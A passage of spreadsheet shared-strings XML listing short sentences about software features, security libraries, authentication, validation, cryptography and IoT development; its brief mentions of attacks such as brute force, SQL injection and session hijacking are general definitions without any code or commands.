Emoji from Unicode 7 and 8
Shortcut-key-combination for the camera app
Reordered navigation buttons for Pixel C
Security and stability fixes
Reference (German): https://de.wikipedia.org/wiki/Liste_von_Android-Versionen</t>
  </si>
  <si>
    <t>Since fields validation requirements are applied as metadata, domain-related code is more condensed.</t>
  </si>
  <si>
    <t>For example, place Facebook strategy files in path_to_opauth/Strategy/Facebook so that FacebookStrategy.php can be found at path_to_opauth/Strategy/Facebook/FacebookStrategy.php.</t>
  </si>
  <si>
    <t>Spring Cloud Vault Config provides client-side support for HashiCorp's Vault secret management in a distributed system.</t>
  </si>
  <si>
    <t>Django OAuth Toolkit can help you providing out of the box all the endpoints, data and logic needed to add OAuth2 capabilities to your Django projects.</t>
  </si>
  <si>
    <t>- Repository Integrity
Many 4GLs produced SQL embedded in C, or other languages, as the output from their definitions.</t>
  </si>
  <si>
    <t>Important new features include a linux 4.15 kernel, Linux security module stacking support, and a default GNOME desktop.</t>
  </si>
  <si>
    <t>Policies are classes that organize authorization logic around a particular model or resource.</t>
  </si>
  <si>
    <t>It available for server-side validation (for a web application for example) as well for client-side apps (for example, those written in Swing).</t>
  </si>
  <si>
    <t>A few of the main features are access control, a search over all twin data and push notifications.</t>
  </si>
  <si>
    <t>It delivers rapid cloud and mobile services deployments, governance, light-weight integration and edge of network security gateway.</t>
  </si>
  <si>
    <t>That is, authorization rules are not defined programmatically in between business logic but in an authorization configuration.</t>
  </si>
  <si>
    <t>Normally the archive that you place the files or data into, gives you some sort of functionality such as encryption, compression or data querying functionality.</t>
  </si>
  <si>
    <t>Its functionality includes data encryption, server authentication, message integrity, and optional client authentication.</t>
  </si>
  <si>
    <t>The features of embedded are useful for developers wanting to create easy to distribute single-user applications that do not need security.</t>
  </si>
  <si>
    <t>A special XPages JavaScript library contains further convenience functionality, for example for client side field validations.</t>
  </si>
  <si>
    <t>It adds improved monitoring, performance, logging and security on top of Tomcat's core capabilities.</t>
  </si>
  <si>
    <t>The solution is to create a routing rule 40 in /lib/dhcpcd/dhcpcd-hooks/40-my-routing-rule
and for the static ip
but I must check, I'm putting the raspberry on a not easy accessible place,
so maybe is better to ask the network admin to assign the ip address by mac address 
and have a option to connect to the raspberry also by my mobile phone AP for more security.</t>
  </si>
  <si>
    <t>A feature of Microsoft's Azure Active Directory Business-to-Consumer service that allows for detailed customization of user sign-up and authentication processes through creation and upload of xml configuration files.</t>
  </si>
  <si>
    <t>It provides mechanisms for allowing users to sign up for accounts, administrative tools, a web server, and a system for different plugins which provide facets of functionality to advertise themselves to the administrator, install themselves on the site database, and be installed and removed from users' accounts.</t>
  </si>
  <si>
    <t>It also contains a production-grade, extensible user module having features like sign up, sign in, verify email, update profile, forgot password, change password, change email, captcha validation etc..</t>
  </si>
  <si>
    <t>It may be used to serve:
R Markdown applications
bookdown books
blogdown websites
xaringan presentations
googleVis charts (to solve
the Flash security problem)
D3 charts which need to load JSON from local files (see also the
animint package)
rCharts and
samatha, etc
See https://github.com/yihui/servr for more details</t>
  </si>
  <si>
    <t>WebSphere DataPower Integration Appliance XI52: a security and integration gateway appliance built for simplified deployment and hardened security, bridging multiple protocols and performing conversions at wire speed.</t>
  </si>
  <si>
    <t>The most common integrations are with CMDB, Incident Management, Problem Management, Change Management, User Administration, and Single Sign-on.</t>
  </si>
  <si>
    <t>To avoid SQL injection, developers use precompiled statements or some database abstraction layers that may have they own protection features.</t>
  </si>
  <si>
    <t>It supports maintaining sandboxed cabal-install repositories, and sandboxed  package databases.</t>
  </si>
  <si>
    <t>IBM MobileFirst Device Runtime Components offer runtime client application program interfaces (API) designed to enhance security, governance and usability.</t>
  </si>
  <si>
    <t>The main services provided by MTS were automated transaction management, instance management and role-based security.</t>
  </si>
  <si>
    <t>That means that you might find easier and more robust to install a Subversion server on your Windows computer and access the repositories via HTTP(S)</t>
  </si>
  <si>
    <t>Zebra Technologies' EMDK, previously know as Motorola's Mobility Enterprise Development Kit, are a series of SDK for Windows Mobile/Windows CE  rugged devices with custom features like barcode scanning ans Enterprise grade Wireless Driver.</t>
  </si>
  <si>
    <t>Output to file or StringIO
Support for page margins and print options
Support for password and non password based sheet protection.</t>
  </si>
  <si>
    <t>Some of the benefits to using the  tag include:
All special characters are escaped
Protection against SQL injection attacks.</t>
  </si>
  <si>
    <t>Some protocols also support message acknowledgement and data compression designed for reliable and/or high-performance network communication.</t>
  </si>
  <si>
    <t>Features
Pawn is a C-like Scripting Language
You can include files in Pawn; so you can arrange a neat structure of Pawn code
Pawn is a scripting language with a compiler that performs static checks, and an abstract machine with (static) P-code verification and dynamic checks.</t>
  </si>
  <si>
    <t>It provides features for implementing both consumers and providers of these protocols using standard Spring and Spring Security programming models and configuration idioms.</t>
  </si>
  <si>
    <t>It's mostly open source, but it has some payment features (backup, administrator rights management, hierarchical storage manager, etc.).</t>
  </si>
  <si>
    <t>It based on the example provided by Seeed Studio Android HCE libraries:
On the Android app that I have, I'm extending Android Developer's HCE example by adding digital signatures and AES encryption.</t>
  </si>
  <si>
    <t>DDS includes a number of unique features including Dynamic Discovery, Type Safety, and Quality of Service (QoS) policies.</t>
  </si>
  <si>
    <t>By providing a secure authentication database and optimized sign-in flows, Identity Toolkit helps you get back to building the features that matter.</t>
  </si>
  <si>
    <t>It is mainly used in relation with certificate-based key management.</t>
  </si>
  <si>
    <t>Basic statistics (ala Apache's mod_status)
Advanced process management with graceful stop/start
Ability to start workers with different uid/gid/chroot/environment and different php.ini (replaces safe_mode)
Stdout &amp; stderr logging
Emergency restart in case of accidental opcode cache destruction
Accelerated upload support
Support for a "slowlog"
Enhancements to FastCGI, such as fastcgi_finish_request() - a special function to finish - request &amp; flush all data while continuing to do something time-consuming (video converting, stats processing, etc.)</t>
  </si>
  <si>
    <t>Arduino Yun is an Arduino-based device with a small OpenWRT Linux operating system (including SSH with shell and Python scripting capability) in addition to Arduino programmability.</t>
  </si>
  <si>
    <t>Unrelated (but existing) errors
Access rights in dav_svn.authz are inherited form root to descendants: you must to redefine only changed rules, but for repository  you cloned parent rights, [svn:/] is absolutely useless
[NAME:/] in section name define (existing) repository-name, not Location from Apache, thus - for repository myrepo (which is, physically, directory /media/usbhdd1/db) [svn:/] section from dav_svn.authz have no sense at all
Check your client's Subversion auth-cache, clean it, if needed.</t>
  </si>
  <si>
    <t>With intuitive user interfaces (web / mobile / desktop), Pydio provides enterprise-grade features to gain back control and privacy of your data: user directory connectors, legacy filesystems drivers, comprehensive admin interface, and much more.</t>
  </si>
  <si>
    <t>Use solution templates, visual designers and components to develop version-neutral, secure and easy deployable extensions for all Office versions.</t>
  </si>
  <si>
    <t>Objective
Automatic auditing of all inserts/updates/deletes for any table in your database with a single line of code, including:
What table was modified?</t>
  </si>
  <si>
    <t>My question is whether it is possible to implement a custom gateway in node.js or java, which can comprise of all the functionalities like device authentication, device provisioning etc.</t>
  </si>
  <si>
    <t>IBM Security AppScan enhances web application security and mobile application security, improves application security program management and strengthens regulatory compliance.</t>
  </si>
  <si>
    <t>The Transaction Log is a log file that keeps an audit trail of all actions performed on a database.</t>
  </si>
  <si>
    <t>It has support for most of the extensions (RFC + IETF drafts) related to IPsec, including IKEv2, X.509 Digital Certificates, NAT Traversal, and many others.</t>
  </si>
  <si>
    <t>Certificate and smart card enrollment, certificate management, and custom module development are also described.</t>
  </si>
  <si>
    <t>The web3.js library is a collection of modules which contain specific functionality for the ethereum ecosystem allowing to ease interactions with Ethereum blockchain, its smart-contracts and related encryption/decryption functions.</t>
  </si>
  <si>
    <t>The Open Vulnerability Assessment System (OpenVAS) is a framework of several services and tools offering a comprehensive and powerful vulnerability scanning and vulnerability management solution.</t>
  </si>
  <si>
    <t>The Visual Studio Addin can be downloaded/installed from the Extension Gallery, it only needs your Raspberry with SSH service enabled.</t>
  </si>
  <si>
    <t>In cryptography, a brute-force attack, or exhaustive key search, is a strategy that can, in theory, be used against any encrypted data.</t>
  </si>
  <si>
    <t>Deadbolt is a powerful, comprehensive authorization module for the Play framework.</t>
  </si>
  <si>
    <t>For questions relating to the programming aspects of .NET framework and security.</t>
  </si>
  <si>
    <t>Safari Extensions are a way to develop and distribute additional functionality for Apple's Safari web browser.</t>
  </si>
  <si>
    <t>Highly Stateful
Zeek keeps extensive application-layer state about the network it monitors.</t>
  </si>
  <si>
    <t>Furthermore, the component provides ways to
  authorize authenticated users based on their roles, and it contains an
  advanced ACL system.</t>
  </si>
  <si>
    <t>Enterprise Ready - Enjoy peace of mind with enterprise grade security and management.</t>
  </si>
  <si>
    <t>As plugin on other PHP frameworks
If you are using any of the following PHP frameworks, you can install Opauth as a plugin or extension.</t>
  </si>
  <si>
    <t>Zend_Acl provides a lightweight and flexible access control list (ACL) implementation for privileges management.</t>
  </si>
  <si>
    <t>An Apache 2.0-licensed distribution of Elasticsearch enhanced with enterprise security, alerting, SQL, and more.</t>
  </si>
  <si>
    <t>However if you wanted to release a production IoT device, you would look at embedding the PEM into the ROM and using private file storage access.</t>
  </si>
  <si>
    <t>The ATECC508A is a pretty easy to source, and reasonably easy to use secure element (key storage is usually OTP).</t>
  </si>
  <si>
    <t>A licensing mechanism that allows for asynchronous cryptography as well as user/machine specific licensing</t>
  </si>
  <si>
    <t>P6Spy is a framework that enables database activity to be seamlessly intercepted and logged with no code changes to the application.</t>
  </si>
  <si>
    <t>The Spring Security REST Grails plugin allows you to use Spring Security for a stateless, token-based, RESTful authentication.</t>
  </si>
  <si>
    <t>This includes fixing security vulnerabilities and other bugs, and improving the usability or performance.</t>
  </si>
  <si>
    <t>Tripwires IT security software reduces risk, ensures systems and data security, and automates regulatory compliance.</t>
  </si>
  <si>
    <t>Entity-Framework identifies changes in model and updates database if there are no risks of data loss.</t>
  </si>
  <si>
    <t>pidCrypt is an open source JavaScript library of cryptographical methods combined in a modular class model.</t>
  </si>
  <si>
    <t>:)
Includes autocompletion, themes, aliases, custom functions, a few stolen pieces from Steve Losh, and more.</t>
  </si>
  <si>
    <t>The library has the following features:
A powerful OAuth 2.0 library with a consistent interface.</t>
  </si>
  <si>
    <t>Awesome JS: A collection of awesome browser-side JavaScript libraries, resources and shiny things for beginners to advanced programmers
Security
JavaScript and the DOM provide the potential for malicious authors to deliver scripts to run on a client computer via the Web.</t>
  </si>
  <si>
    <t>The Tidy extension in PHP supports functions to covert bad HTML to XHTML with various options like dropping deprecated tags like font tag and hiding comments and dropping proprietary tags and dropping empty paragraphs and a lot more.</t>
  </si>
  <si>
    <t>In addition to standard web features developers can access (with permission from the end user) the filesystem, device information, camera, microphone, sms, gps, address book, calendar, phone, advertizing services, payment services, accelerometer, BBM, custom dialogs and much more.</t>
  </si>
  <si>
    <t>Here are the requirements:
I want to fully rely on iPhone's built-in components without any peripherals (for example, HiJack).</t>
  </si>
  <si>
    <t>After comparing supported cipher charts and blindly guessing I thought that TLS_DHE_RSA_WITH_AES_128_CBC_SHA might be a good choice and would be supported by google.</t>
  </si>
  <si>
    <t>There is a jailbreak for iPhone 5 that was released a few weeks ago, but I'm not aware of any tools for it that allow you to fake to iOS's External Accessory framework that your accessory contains the authentication processor.</t>
  </si>
  <si>
    <t>While the Kinect drivers may already have feature detection included (I'm not sure) you can also use OpenCV for detecting features in the image.</t>
  </si>
  <si>
    <t>DataWedge provides a convenient mechanism for non-scanning aware applications to receive data from embedded or connected data capture devices</t>
  </si>
  <si>
    <t>A validation rule is a criterion used in the process of data validation, after the data has been encoded onto an input medium.</t>
  </si>
  <si>
    <t>Form validation is the operation through which form fields are verified to contain the correct input.</t>
  </si>
  <si>
    <t>CodeIgniter's Hooks feature provides a means to tap into and modify the inner workings of the framework without hacking the core files.</t>
  </si>
  <si>
    <t>ConfigObj is a python module for configuration file reading, writing and validation, with validation being the primary feature that distinguishes it from the built-in ConfigParser module.</t>
  </si>
  <si>
    <t>Python Social Auth is an easy to setup social authentication/registration mechanism with support for several frameworks and auth providers.</t>
  </si>
  <si>
    <t>It includes more stringent requirements than HTTP/1.0 in order to ensure reliable implementation of its features.</t>
  </si>
  <si>
    <t>ASP.NET provides a set of validation controls that provide an easy-to-use but powerful way to check for errors and, if necessary, display messages to the user.</t>
  </si>
  <si>
    <t>A simple, lightweight jQuery plugin for reading, writing and deleting cookies.</t>
  </si>
  <si>
    <t>It supports referential integrity like adjacency list, but also supports querying hierarchies of arbitrary depth like nested sets.</t>
  </si>
  <si>
    <t>Alternately, an attacker may install tools to facilitate activities during an ongoing intrusion, such as back doors or information collection.</t>
  </si>
  <si>
    <t>The Sciter and HTMLayout components are licensed under liberal licenses that permit commercial and non-commercial use at no cost, provided that attribution is sufficiently shown.</t>
  </si>
  <si>
    <t>DataWedge provides a convenient mechanism for non-scanning aware applications to receive data from embedded or connected data capture devices.</t>
  </si>
  <si>
    <t>The easiest way to use LocalDB is to connect to the automatic instance owned by the current user by using the connection string "Server=(localdb)\MSSQLLocalDB;Integrated Security=true".</t>
  </si>
  <si>
    <t>supplies a set of commonly needed validators, but inevitably, developers will wish to write custom validators for their particular needs.</t>
  </si>
  <si>
    <t>As you may already have inferred from the above description of Zend_Validate_Interface, validation classes provided with Zend Framework return a boolean value for whether or not a value validates successfully.</t>
  </si>
  <si>
    <t>It has features that allows easily enter codes, manipulate text, search and replace capabilities, and more.</t>
  </si>
  <si>
    <t>The purpose of database versioning is to assist in the detection and resolution of fraudulent or accidental modifications.</t>
  </si>
  <si>
    <t>This suite is composed of tools which helps in providing best solutions for Business Intelligence Queries.</t>
  </si>
  <si>
    <t>Support SOCKS protocols version4 and version5 (RFC 1928)
Support authorization for SOCKS v5 (RFC 1929)
Support chain of SOCKS-servers.</t>
  </si>
  <si>
    <t>System.Data.Entity.Infrastructure.Interception.DatabaseLogger is a
new interceptor that makes it easy to log all database operations to 
a file.</t>
  </si>
  <si>
    <t>From its website:
Python Social Auth
Python Social Auth is an easy to setup social
  authentication/registration mechanism with support for several
  frameworks and auth providers.</t>
  </si>
  <si>
    <t>Unlike the CodeIgniter validation library, this won't validate the POST data, rather, it validates the data passed directly through.</t>
  </si>
  <si>
    <t>PKIX details X509 certificate formats, issuing rules and validation rules in various Request for Comments (RFC).</t>
  </si>
  <si>
    <t>This class is a subclass of a PFObject, and retains the same functionality of a PFObject, but also extends it with various user specific methods, like authentication, signing up, and validation uniqueness.</t>
  </si>
  <si>
    <t>It is robust and fault tolerant with tunable reliability mechanisms and many failover and recovery mechanisms.</t>
  </si>
  <si>
    <t>I am trying to prototype a X509 certificates based group enrollment, and not for only one device (as dice_device_enrollment by default would provide), but for several, and, from what I learned, I will need to implement my own custom HSM library.</t>
  </si>
  <si>
    <t>A flexible website security component, RadCaptcha will protect your registration, comment, poll, content submission, etc.</t>
  </si>
  <si>
    <t>Due to security issues in Internet Explorer, the support for this URL Scheme was dropped with the release of Windows XP SP2.</t>
  </si>
  <si>
    <t>More common rule for 4.x kernels will be the following
The rule in the initial answer will fail to chown the exported gpio if there's a symbolic link in the path
UPD please beg in mind that when you export some GPIO via sysfs, you should wait for udev rule to fire and complete before you get desired access rights.</t>
  </si>
  <si>
    <t>std::unique_ptr, together with std::shared_ptr and (std::weak_ptr) form the core smart pointers used in C++ to implement RAII semantics, especially with respect to traditional memory management.</t>
  </si>
  <si>
    <t>Async EventMachine HTTP client, with support for asynchronous HTTP connection with support for proxys and Basic Auth &amp; OAuth.</t>
  </si>
  <si>
    <t>A flexible, reliable, high performant and scalable transactional framework that allows Big Data applications to execute ACID transactions on top of MVCC key/value NoSQL datastores.</t>
  </si>
  <si>
    <t>Password management
Several built-in server controls are provided that interact with membership providers to allow rapid drag-and-drop development of common user management and authentication tasks.</t>
  </si>
  <si>
    <t>Applications include cryptography, error correcting codes, checksums, and programming, since many tasks in programming are made much simpler using modular arithmetic.</t>
  </si>
  <si>
    <t>Firebase Bolt Compiler
Bolt is a new language definition for creating types, performing data validation, and adding security rules to paths.</t>
  </si>
  <si>
    <t>Authoring application ("Bloomreach Experience Manager")
The CMS is a web application, essentially providing the user
interface through which the content management and administrative
functionality can be used.</t>
  </si>
  <si>
    <t>Features like encryption, failover destination, precise timestamps etc make it a ideal candidate for enterprise log management.</t>
  </si>
  <si>
    <t>The connector architecture defines a set of scalable, secure, and transactional mechanisms that enable the integration of EISs with application servers and enterprise applications.</t>
  </si>
  <si>
    <t>The requirements are that all log messages have to be written to a database and that some messages having a higher loglevel need to be send as a high priority alert using sms.</t>
  </si>
  <si>
    <t>Usage statistics may include button and menus clicks, memory usage, preferences, features most used, etc... Usually all data are anonymous information.</t>
  </si>
  <si>
    <t>This ensures that manual and automated test results are consistent through the quality assurance cycle and that any defects within the software are not fixed in a haphazard fashion in preparation for a release.</t>
  </si>
  <si>
    <t>Security aspects related to access control, delegation of administration tasks and other network administration tasks can be fully centralized and managed via the Web UI or the  Command Line tool.</t>
  </si>
  <si>
    <t>The mass-assignment feature may become a problem, as it allows an attacker to set any models attributes by manipulating the hash passed to a models new() method.</t>
  </si>
  <si>
    <t>Attribute Based Access Control (ABAC) is an access control method based on attributes (key-value pairs) that are used inside policies and rules to express access control logic.</t>
  </si>
  <si>
    <t>Service Broker allows internal or external processes to send and receive guaranteed, asynchronous messages by using extensions to Transact-SQL Data Manipulation Language (DML).</t>
  </si>
  <si>
    <t>The query validation does not alter the database state.</t>
  </si>
  <si>
    <t>Model Validation is ASP.NET MVC validation method for your models with property attributes.</t>
  </si>
  <si>
    <t>Sinon is a mocking framework for JavaScript, which can create spies, stubs and mocks.</t>
  </si>
  <si>
    <t>It is a Java based embedded database that may be exposed over HTTP using the Fuseki Server also from the Apache Jena project.</t>
  </si>
  <si>
    <t>Support for MAC; Permissions; integrated Version Control; Personal Series reporting tools (later removed when the 3rd party decided not to enhance the product); Wider platform support.</t>
  </si>
  <si>
    <t>What you'll need to do is modify the source code for the Web Server class to support digest access authentication: AFAIK it does not support it out of the box.</t>
  </si>
  <si>
    <t>And from the the Error Messages that both of you seem to be having is somehow your network interfaces such as Loopback Addresses cannot be accessed using the codes that have been written with Visual Studio.</t>
  </si>
  <si>
    <t>Further features include secret management and service discovery.</t>
  </si>
  <si>
    <t>For issues related to Intel semiconductor chips and assemblies, Intel architectural features and ISA extensions, and Intel chips micro-architecture.</t>
  </si>
  <si>
    <t>Prometheus itself is a time-series storage server that periodically pulls metrics from monitored entities.</t>
  </si>
  <si>
    <t>It integrates and certifies both tooling and runtime components by combining Eclipse, Eclipse Tooling, and the JBoss Enterprise Application Platform.</t>
  </si>
  <si>
    <t>For  questions relating to the programming aspects of .net framework and security.</t>
  </si>
  <si>
    <t>Safari app extensions are built on the standard app extension model.</t>
  </si>
  <si>
    <t>Integration with AWS Identity and Access Management (IAM) provides resource-level control of each repository.</t>
  </si>
  <si>
    <t>Used to resolve merge conflicts;
built-in SSH-client (optional, you can also use an external SSH-client).</t>
  </si>
  <si>
    <t>It offers non-destructive filtering, comprehensive event properties such session IDs and user names, reliable process information, full thread stacks with integrated symbol support for each operation, simultaneous logging to a file, and much more.</t>
  </si>
  <si>
    <t>It also provides an on-line management console and workflows for user registration and password recovery.</t>
  </si>
  <si>
    <t>OrigoDB Server, offered commercially, is a standalone server with enterprise features like high master/slave replication.</t>
  </si>
  <si>
    <t>Mature HTTP Support: Automatic management of client connections and cookies.</t>
  </si>
  <si>
    <t>biff is a mail notification system for UNIX with support for instant notification in the terminal the recipient is logged in to.</t>
  </si>
  <si>
    <t>Other features like JavaScript debugging, analyzing network traffic and managing cookies are not supported.</t>
  </si>
  <si>
    <t>They provide various examples of attack vectors, and how to protect your applications against them, including examples in multiple programming languages.</t>
  </si>
  <si>
    <t>The WsHttpBinding is a WCF (Windows Communication Framework) binding class that uses HTTP or HTTPS as a transport protocol and is complaint with a variety of WS* standards (reliability,security,etc).</t>
  </si>
  <si>
    <t>Additionally it can be used to cache query results and audit modifications of your entities and their properties.</t>
  </si>
  <si>
    <t>All
  queries, including those with READUNCOMMITTED and NOLOCK hints,
  acquire Sch-S (schema stability) locks during compilation and
  execution.</t>
  </si>
  <si>
    <t>For this, Django provides full support for cookie- and session-based messaging, for both anonymous and authenticated users.</t>
  </si>
  <si>
    <t>The most famous being OpenStack's Object Storage component called as Cinder
Source
Wikipedia page on Consistent Hashing</t>
  </si>
  <si>
    <t xml:space="preserve">
Google Play offers a licensing service that lets you enforce licensing
  policies for applications that you publish on Google Play.</t>
  </si>
  <si>
    <t>Yes, there were already close-to-perfect working tools supporting rule-based attacks like PasswordsPro, John The Ripper.</t>
  </si>
  <si>
    <t>There are also some additional reliability and robustness provisions in the standard SQL Server 2016 such as fallover and other advanced provisions that are not part of SQL Server Express.</t>
  </si>
  <si>
    <t>A cryptographically strong hash function has two additional features: it is mathematically proven to be irreversible and minimizes collisions.</t>
  </si>
  <si>
    <t>From the docs of the  module:
Hunter is a flexible code tracing toolkit, not for measuring coverage, but for debugging, logging, inspection and other nefarious purposes.</t>
  </si>
  <si>
    <t>Security can be scoped, allowing privileges to be defined at application- and environment-levels; BuildMaster also supports LDAP-based authentication.</t>
  </si>
  <si>
    <t>The same origin policy is an important security concept for a number of browser-side programming languages, such as JavaScript.</t>
  </si>
  <si>
    <t>Feels like a crypto smart card would be able to do something like that, but I don't know whether that includes the functionality to keep a counter or include the timestamp.</t>
  </si>
  <si>
    <t>Writes on one cache line would force other cores working in the same line to re-validate their cache.</t>
  </si>
  <si>
    <t>Features:
Full javascript (all npm package availables)
Task flow based on orchestrator (gulp core)
Official deploy task
Login and interactive ssh commands
Easily extendable</t>
  </si>
  <si>
    <t>This facilitates a wide range of applications and smaller form factor devices in the healthcare, fitness, security and home entertainment industries.</t>
  </si>
  <si>
    <t>Snap connections for docker:
snap interfaces |grep docker
:docker-support           docker:privileged,docker:support
:firewall-control         docker
:network                  docker
:network-bind             docker
docker:docker-daemon      docker:docker-cli
-                         docker:account-control
-                         docker:home
Is there any additional steps needed to start docker daemon properly?</t>
  </si>
  <si>
    <t>Blocks of a GNU/Linux Embedded System
Hardware
SoC
The SoC is where all the processing takes places, it is the main processing unit of the whole system and the only place that has "intelligence".</t>
  </si>
  <si>
    <t>Based on this document, you can see, that the device twin is used for non-frequently persistence of the device state, for example: device firmware version, some device configurations, threshold for alert, etc.</t>
  </si>
  <si>
    <t>For this key layout file to register with a certain device, the key layout filename must follow a particular naming convention corresponding to details about the device you want to use (gpio-keys in my case).</t>
  </si>
  <si>
    <t>Maybe maybe maybe you have a chance to find some non-safety features with this method but finding security functionalities like ABS is heavily in doubt.</t>
  </si>
  <si>
    <t>Unfortunately, many core components of Windows have been designed as shared components: the registry, cryptography, and graphics subsystems, among others.</t>
  </si>
  <si>
    <t>Compose (formerly MongoHQ) is a Database-as-a-Service (DBaaS) platform for securely hosting and managing databases instances including MongoDB.</t>
  </si>
  <si>
    <t>PolarSSL is a light-weight (embedded) open source cryptographic and SSL/TLS library written in C that is easy to understand, easy to use, easy to integrate and easy to expand.</t>
  </si>
  <si>
    <t>In computing, the same origin policy is an important security concept for a number of browser-side programming languages, such as JavaScript.</t>
  </si>
  <si>
    <t>Seafile is an open source cloud storage system with advanced support for file syncing, privacy protection and teamwork.</t>
  </si>
  <si>
    <t>It supports handling of HTTP code 401, manipulating cookies and SSL pinning, which are not supported features with XMLHttpRequest or fetch API.</t>
  </si>
  <si>
    <t>Scapy is a powerful interactive packet manipulation tool, packet generator, network scanner, network discovery, packet sniffer, etc.</t>
  </si>
  <si>
    <t>Represents the SecureElement (SE) in NFC Devices, of any form-factor such as USIM card, a secure SD card, an embedded secure element, etc..</t>
  </si>
  <si>
    <t>Firstly, it provides developers with a rich set of core validation methods, which can also be used outside the context of forms.</t>
  </si>
  <si>
    <t>LinkedMDB, the Linked Movie Database, is a database of movie-related information exposed in RDF which can be queried using SPARQL.</t>
  </si>
  <si>
    <t>And today we start the process by delivering a clear governance model, increased transparency and access.</t>
  </si>
  <si>
    <t>This makes easier the creation of tools for data injection on arbitrary connections, IP spoofing and TCP/IP session hijacking.</t>
  </si>
  <si>
    <t>Setting different database credentials via this method is extremely easy and makes deployment simple.</t>
  </si>
  <si>
    <t>DuckDuckGo is an Internet search engine that emphasizes protecting searchers' privacy and avoiding the filter bubble of personalized search results</t>
  </si>
  <si>
    <t>Entity Framework (EF) Core is a lightweight, extensible, and cross-platform version of the popular Entity Framework data access technology.</t>
  </si>
  <si>
    <t>An additional and highly positive feature of schematron is that the schema writer is free to write their own validation messages.</t>
  </si>
  <si>
    <t>The formal definition of database schema is a set of formulas (sentences) called integrity constraints imposed on a database.</t>
  </si>
  <si>
    <t>Applications built with Microsoft Access can be distributed to end users with a free runtime version of the application that lets them view databases without needing the full installation of Access.</t>
  </si>
  <si>
    <t>For now just getting the mock client to create its own signature in code (not through the device explorer) is essential before we even worry if our products in the field can compute this (Finding this really over complicated for field devices).</t>
  </si>
  <si>
    <t>RACF has continuously evolved to support such modern security features as digital certificates/public key infrastructure services, LDAP interfaces, and case sensitive IDs/passwords.</t>
  </si>
  <si>
    <t>Caution: External storage can become unavailable if the user mounts the external storage on a computer or removes the media, and there's no security enforced upon files you save to the external storage.</t>
  </si>
  <si>
    <t>It mixes together all the aspects of HIDS (host-based intrusion detection), log monitoring and SIM/SIEM together in a simple, powerful and open source solution.</t>
  </si>
  <si>
    <t>Normally, you'd serve this information in the form of HTML, but for some documents, PDF is preferred over HTML for better printing quality, for identical presentation on a variety of platforms, for security reasons, or to reduce the file size.</t>
  </si>
  <si>
    <t>The protocol also needs to be:
Easy/simple to implement since I would need to write both client and server myself (limited, embedded hardware)
Fairly robust, fault checking/recovery etc
At least somewhat standardized, in case I need to get a third party to implement it on some other hardware
Kermit?</t>
  </si>
  <si>
    <t>Hijax was proposed by Jeremy Keith as a technique for building web applications that degrade gracefully by only using AJAX techniques to hijack form submissions and responses, updating the DOM to reflect the results of the request/response cycle.</t>
  </si>
  <si>
    <t>Also known as "Conflict-Free Replicated Data Types", CDRTs describes a collection of data types for distributed computing which are guaranteed to convergeproduce a consistent and semantically reasonable resultwithout locking, even in the presence of concurrent updates.</t>
  </si>
  <si>
    <t>A matter includes:
Saved search queries
A list of accounts with data on hold
A list of the accounts that can access the matter
Export sets for the matter
An audit trail for the matter
Holdsallow you to preserve messages and files indefinitely to meet legal or preservation obligations.</t>
  </si>
  <si>
    <t>RELIC is a modern cryptographic meta-toolkit with emphasis on efficiency and flexibility.</t>
  </si>
  <si>
    <t>Mobility and security, both
Integrate with your existing enterprise environment.</t>
  </si>
  <si>
    <t>An easy-to-use, Objective-C interface to the AES functionality of CommonCrypto.</t>
  </si>
  <si>
    <t>SystemVerilog is a unified hardware design, specification, and verification language based on extensions to Verilog.</t>
  </si>
  <si>
    <t>It  features a UNIX like environment, microkernel based design and POSIX compliance.</t>
  </si>
  <si>
    <t>Finally, Hono provides APIs for integration with existing device and credentials management systems.</t>
  </si>
  <si>
    <t>These can range from server-side programming language support to authentication schemes.</t>
  </si>
  <si>
    <t>The system consists of a STM32 microcontroller, some sensors and a modem with the following features:
IP packet transfer protocol
TLS support
SHA-256 support
control via hayes command set (AT commands)
I want to extend my code base by the usage of the Azure IoT Client C SDK.</t>
  </si>
  <si>
    <t>Handling with unknown file types violates with the philosophy, what if your downloaded file happens to be some worm spam that ends with .bat etc...You may also try to submit a request to add this new feature for development through the Windows Feedback tool, but as my personal opinion, this could be an unreasonable request.</t>
  </si>
  <si>
    <t>Verifiable C is a program logic for the C programming
language, used in the Verified Software Toolchain system.</t>
  </si>
  <si>
    <t>Monero (XMR) is a decentralized, blockchain-based crypto currency emphasizing privacy aspects of the users and their transactions.</t>
  </si>
  <si>
    <t>Monitoring operational intelligence for your
  IoT devices is key to preserving the business-relevant data stream.</t>
  </si>
  <si>
    <t>You could easily use Azure IoT Toolkit extension for Visual Studio Code to generate SAS Token for IoT Hub as below screenshot.</t>
  </si>
  <si>
    <t>KeeFox adds free, secure and easy to use password management features to Firefox.</t>
  </si>
  <si>
    <t>It provides facilities for writing clean &amp; maintainable networking code in iOS, along with customisable serialisation / marshalling, validation and stubbing requests.</t>
  </si>
  <si>
    <t>The JEDI Windows Security Code Library is a bunch of Delphi classes wrapping the Windows Security programming which uses complex C style.</t>
  </si>
  <si>
    <t>NSA Security-Enhanced Linux (SELinux) is an implementation of a flexible mandatory access control architecture in the Linux operating system.</t>
  </si>
  <si>
    <t>There was no solution available to crack plain MD5 which supports MPI using rule-based attacks.</t>
  </si>
  <si>
    <t>Functionality provided by WSGI middleware may include authentication, logging, url redirection, creation of sessions, and compression.</t>
  </si>
  <si>
    <t>Although I tried to add Authenticated Users group to Performance Monitor Users and Performance Log Users groups.</t>
  </si>
  <si>
    <t>The Google APIs Console is a web interface for managing and viewing traffic data, authentication, and billing information for the Google APIs that are used by your project.</t>
  </si>
  <si>
    <t>The new version of the protocol (HTTP 1.1) includes more stringent requirements than HTTP/1.0 in order to ensure reliable implementation of its features.</t>
  </si>
  <si>
    <t>Though it largely resembles most other scripting languages, one of its most unique attributes is how a batch file is treated differently from a terminal command input with regard to commands and pure data:
Command files are extremely powerful and convenient for performing many system operations, including privileged operations.</t>
  </si>
  <si>
    <t>TAL focusses on abstracting the significant differences between how different connected TV devices implement the following functionality:
Media playback
Animation
Networking
Logging
JSON parsing
Persistant storage
Remote control key codes
Additional Resources:
Github repository
Documentation
Official Sample Application</t>
  </si>
  <si>
    <t>So i want to make an automation for submit token, which there are step, the raspberry capture the token automatically.</t>
  </si>
  <si>
    <t>It also provides access control and several collaboration features such as bug tracking, feature requests, task management, and wikis for every project.</t>
  </si>
  <si>
    <t>Considering there are a bunch of mobile devices (Android and iOS) that need to be sending data to AWS-IoT via MQTT custom authorizer to check for valid token based on business logic is to be implemented.</t>
  </si>
  <si>
